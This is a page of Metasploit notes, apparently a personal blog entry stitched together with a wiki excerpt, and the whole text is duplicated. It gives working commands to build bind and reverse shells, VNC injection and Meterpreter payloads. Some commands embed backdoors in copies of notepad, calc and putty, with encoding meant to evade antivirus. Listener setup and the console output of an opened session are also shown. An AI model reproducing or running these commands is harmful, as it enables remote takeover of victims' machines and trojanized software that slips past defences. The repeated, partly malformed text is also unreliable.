# ./msfpayload windows/meterpreter/reverse_https LHOST=10.13.37.6 LPORT=443 X> /tmp/reverse_https_443.exe
#./msfconsole
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -x /root/notepad.exe -k -o /root/backdoor.exe -e x86/shikata_ga_nai -c 2
Metasploit Payloads - msfpayload
This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.
These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.
In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.
1. For a listening shell on the target
Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe
Target:
run Listen-shell.exe
Hacker:
nc 192.168.1.110 2482
2. For a reverse shell on the target
Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-shell.exe
3. For a VNC listener on target
Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe
Target:
run Listen-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E
4. For a reverse VNC session
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet. not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
Target:
run met-reverse.exe
UPDATE: Payload should for 6 should read:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe
=============================
Using Exploit-less Handlers (Executable Payloads)[edit]
At some point during your use with Metasploit you'll come into the need to run a payload without an exploit. This is possible with the use of the multi/handler exploit module.
Step 1. Generate your payload executable:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > met-reverse.exe
Step 2. Start your listener:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Step 3. Run the executable and interact
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
This document contains several syntax examples for creating and using stand alone payloads. It also contains discussion about avoiding antivirus detection. http://www.giac.org/certified_professionals/practicals/GCIH/01072.php
msf payload(reverse_tcp) > generate -t raw -f C:/folder/filename
#./msfconsole
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -x /root/notepad.exe -k -o /root/backdoor.exe -e x86/shikata_ga_nai -c 2
Metasploit Payloads - msfpayload
This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.
These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.
In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.
1. For a listening shell on the target
Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe
Target:
run Listen-shell.exe
Hacker:
nc 192.168.1.110 2482
2. For a reverse shell on the target
Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-shell.exe
3. For a VNC listener on target
Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe
Target:
run Listen-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E
4. For a reverse VNC session
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet. not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
Target:
run met-reverse.exe
UPDATE: Payload should for 6 should read:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe
=============================
Using Exploit-less Handlers (Executable Payloads)[edit]
At some point during your use with Metasploit you'll come into the need to run a payload without an exploit. This is possible with the use of the multi/handler exploit module.
Step 1. Generate your payload executable:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > met-reverse.exe
Step 2. Start your listener:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Step 3. Run the executable and interact
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
This document contains several syntax examples for creating and using stand alone payloads. It also contains discussion about avoiding antivirus detection. http://www.giac.org/certified_professionals/practicals/GCIH/01072.php
msf payload(reverse_tcp) > generate -t raw -f C:/folder/filename
